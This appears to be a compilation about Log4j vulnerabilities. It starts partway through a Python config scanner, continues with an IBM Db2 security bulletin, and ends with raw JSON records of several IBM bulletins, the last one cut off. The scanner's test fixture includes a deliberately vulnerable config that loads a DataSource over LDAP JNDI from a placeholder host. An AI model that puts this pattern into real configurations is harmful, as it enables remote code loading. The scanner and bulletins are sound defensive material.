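# Weak: the DataSource is resolved through a non-java: JNDI name (CVE-2021-44832 shape).
SAMPLE_LOG4J2_XML_WEAK = """\
<Configuration>
  <Appenders>
    <JDBC name="db" tableName="event_log">
      <DataSource jndiName="ldap://example.invalid/cn=LoggingDataSource"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="db"/></Root></Loggers>
</Configuration>
"""

# Corrected: a container-local java: name, which is all Log4j 2.17.1 will resolve.
SAMPLE_LOG4J2_XML_OK = SAMPLE_LOG4J2_XML_WEAK.replace(
    "ldap://example.invalid/cn=LoggingDataSource", "java:comp/env/jdbc/LoggingDataSource")


def demo() -> Dict[str, List[str]]:
    return {
        "log4j1.properties": check_properties(SAMPLE_LOG4J1_PROPERTIES),
        "log4j2-weak.xml": check_xml(SAMPLE_LOG4J2_XML_WEAK),
        "log4j2-ok.xml": check_xml(SAMPLE_LOG4J2_XML_OK),
    }


if __name__ == "__main__":
    import sys
    results = {p: check_file(p) for p in sys.argv[1:]} if len(sys.argv) > 1 else demo()
    for name, issues in results.items():
        print(name, "->", issues or "no findings")
```

A hit from this script is a precondition, not proof of compromise: a JMSAppender or a JNDI-backed DataSource can be legitimate. What matters is that the file is not writable by anyone but the service owner, that the JNDI name is a container-local `java:` one, and, for Log4j 1.x, that the bulletin's fix (removing Log4j) has been applied, since that branch gets no upstream patch.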
* * *

## Summary

The Apache Log4j open source library used by IBM® Db2® is affected by multiple vulnerabilities that could allow a remote attacker to execute arbitrary code on the system or cause a denial of service. This library is used by the Db2 Federation feature. The fix for the vulnerabilities is to update the Apache Log4j library to 2.17.0. See the CVE-2021-4104 bulletin for Log4j v1, and the CVE-2021-44832 and CVE-2021-44228 bulletins for Log4j v2.

## Vulnerability Details

**CVEID:** [CVE-2021-45105](https://vulners.com/cve/CVE-2021-45105)  
**DESCRIPTION:** Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process.  
CVSS Base score: 7.5  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215647> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:** [CVE-2021-45046](https://vulners.com/cve/CVE-2021-45046)  
**DESCRIPTION:** Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments.  
CVSS Base score: 9  
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/215195> for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)

## Affected Products and Versions

Fix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following Federation features are configured:

 * DVM JDBC wrapper driver
 * NoSQL wrapper driver (for Hadoop)
 * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)

IBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected. Please note that log4j v1.x was removed in a previous build; customers on an older version of Db2 are strongly recommended to apply those fixes. See this [Security Bulletin](https://www.ibm.com/support/pages/node/6528678) for details.

To determine whether Federation is enabled, issue the following:

    db2 get dbm cfg | grep FEDERATED

If a value of NO is returned, you are not vulnerable.

You can determine whether you are using one of the affected wrappers as follows.

To determine whether the DVM JDBC wrapper is in use, issue the following statement:

    db2 "select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'"

If a servername is returned, you are using the DVM JDBC wrapper via the DvDriver class.

To determine whether the NoSQL Hadoop wrapper is in use, issue the following statement:

    db2 "select * from syscat.servers where servertype = 'HDFSPARQUET'"

If one or more rows are returned, the NoSQL Hadoop wrapper is in use.

To determine whether the NoSQL Blockchain wrapper is in use, issue the following statement:

    db2 "select * from syscat.serveroptions where option='PEER_URL'"

If one or more rows are returned, the NoSQL Blockchain wrapper is in use.

## Remediation/Fixes

Customers running any vulnerable fix pack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fix pack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fix pack level of the appropriate release to remediate this vulnerability.

Note: These builds supersede the builds provided for resolution of [CVE-2021-44228](https://www.ibm.com/support/pages/node/6526462) and [CVE-2021-4104](https://www.ibm.com/support/pages/node/6528678).

**Release** | **Fixed in fix pack** | **APAR** | **Download URL**
---|---|---|---
V11.5 | TBD | [IT39474](https://www.ibm.com/support/pages/apar/IT39474) | Special Build for V11.5.6: [AIX 64-bit](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135867_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A427692916793185792&includeSupersedes=0), [Linux 32-bit, x86-32](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13478_135868_DSClients-linuxia32-client-11.5.6.0-FP000%3A229400084660469792&includeSupersedes=0), [Linux 64-bit, x86-64](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135870_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A138274479725175920&includeSupersedes=0), [Linux 64-bit, POWER™ little endian](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135866_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A979582216771911552&includeSupersedes=0), [Linux 64-bit, System z®, System z9® or zSeries®](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135869_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A276882097350046112&includeSupersedes=0), [Windows 32-bit, x86](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13478_135865_DSClients-nt32-client-11.5.6000.1809-FP000%3A661797018354168448&includeSupersedes=0), [Windows 64-bit, x86](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135864_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A583179472819140992&includeSupersedes=0)
V11.5 | 11.5.8 | [IT39474](https://www.ibm.com/support/pages/apar/IT39474) | <https://www.ibm.com/support/pages/node/6830623>

## Workarounds and Mitigations

None.

_Record: IBM Db2 security bulletin (last seen 2023-05-23T17:44:31). Aggregate record score (higher than any per-CVE score given in the bulletin itself): CVSS v3.1 10.0 Critical, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H._
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-11T17:20:42", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-11-11T17:20:42", "id": "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "href": "https://www.ibm.com/support/pages/node/6528672", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:44:31", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the log4j library. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-44832, CVE-2021-45046 and CVE-2021-45105 for bulletins relating to Log4j V2. 
Updating log4j to a version 2.15.0 or higher also addresses CVE-2021-4104.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured: \n\n\nFederation: \n\n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected.\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 
1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| IT39389| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134764_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A759307440669784704&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134766_DSClients-linuxia32-client-11.5.6.0-FP000%3A655540181122919168&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134765_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A321475938953624576&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little 
endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134763_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A676852752763543680&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134767_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A646964920519258496&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134762_DSClients-nt32-client-11.5.6000.1809-FP000%3A980553972695302272&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134761_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A220578880243028736&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| 11.5.8| IT39389| <https://www.ibm.com/support/pages/node/6830623> \n \n## Workarounds and Mitigations\n\nA user with SYSADM authority should perform the following:\n\ndb2stop\n\ndb2set DB2_JVM_STARTARGS=\"-Dlog4j2.formatMsgNoLookups=true\"\n\ndb2start\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-11T17:17:23", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-11-11T17:17:23", "id": "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "href": "https://www.ibm.com/support/pages/node/6526462", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:58:23", "description": "## Summary\n\nIBM Sterling External Authentication Server is vulnerable to an arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix upgrades all Apache Log4j 1.x to Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<https://vulners.com/cve/CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. 
\nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling External Authentication Server| 6.0.3 \nIBM Sterling External Authentication Server| 6.0.2 \nIBM Sterling External Authentication Server| 2.4.3.2 \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| iFix| Remediation \n---|---|---|--- \nIBM Sterling External Authentication Server| 6.0.3| iFix 01 Plus Build 141| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus Build 214| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling External Authentication Server| 2.4.3.2| iFix 13 Plus Build 296| [Fix Central - 2432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=2.4.3.2&platform=All&function=all> \"Fix Central - 2432\" ) \nThis fix also remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. 
\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T19:03:49", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Secure External Authentication Server (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T19:03:49", "id": "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "href": "https://www.ibm.com/support/pages/node/6538954", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:42:55", "description": "## Summary\n\nThe following security issue has been identified in components related to IBM Tivoli Monitoring (ITM) portal server and client. 
\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<https://vulners.com/cve/CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Monitoring| 6.3.0 \n \n## Remediation/Fixes\n\nIn addition to the CVE in this bulletin the following are also addressed by the WebSphere patch below:\n\n[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>), [CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>), [CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>), [CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>)\n\n \nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n6.3.0.7-TIV-ITM-SP0010| 6.3.0.7 Fix Pack 7 Service Pack 10| <https://www.ibm.com/support/pages/node/6550868> \n6.X.X-TIV-ITM_TEPS_WAS-IHS_ALL_8.55.20.02| 6.3.0.7 Fix Pack 7 Service Pack 5 or later| <https://www.ibm.com/support/pages/node/6538128> \n \n## Workarounds and Mitigations\n\nNone of the vulnerable instances of log4j are actually used by ITM. If enabled, the IBM Tivoli Monitoring dashboard data provider may be using log4j client libraries which are not the actual log4j core function. 
Note: all versions of log4j components are only installed if you've installed one of the following components:\n\ncj Tivoli Enterprise Portal Desktop Client \ncw Tivoli Enterprise Portal Browser Client \ncq Tivoli Enterprise Portal Server \n\nThe provided remediation will safely remove or update all vulnerable instances of log4j.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-30T17:31:59", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j may affect IBM Tivoli Monitoring (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-12-30T17:31:59", "id": "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "href": "https://www.ibm.com/support/pages/node/6551452", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:52:33", "description": "## Summary\n\nThere are multiple Apache Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45105) impacting IBM StoredIQ for Legal. 
Apache Log4j is included in WebSphere Application Server (WAS), which is distributed with IBM StoredIQ for Legal. These vulnerabilities are addressed by removing Apache Log4j from WAS.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nStoredIQ for Legal| 2.0.3 \n \n\n\n## Remediation/Fixes\n\nFor the affected version specified above, apply [PH42762](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise%20Content%20Management&product=ibm/Information+Management/StoredIQ+for+Legal&release=2.0.3.14&platform=All&function=all> \"\" ) interim fix on top of WAS 8.5.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-09T07:56:30", "type": "ibm", "title": "Security Bulletin: IBM StoredIQ for Legal is vulnerable to denial of service and remote code execution due to Apache log4j ( CVE-2021-44228, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-06-09T07:56:30", "id": "1827A1B8985F4A2B91EE262D4C17EF01B71CFEA86DB0A386BD1C1B098E2F4B69", "href": "https://www.ibm.com/support/pages/node/6593781", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:44:32", "description": "## Summary\n\nThe Apache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the log4j library to version 2.17.1. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-45046, CVE-2021-45105 and CVE-2021-44228 for bulletins relating to Log4j V2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<https://vulners.com/cve/CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured:\n\nFederation: \n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected by this issue. Please note that log4j v1.x was removed in a previous build, and customers are strongly recommended to apply those fixes if you are on an older version of Db2. 
See [Security Bulletin](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin\" ) for details.\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where 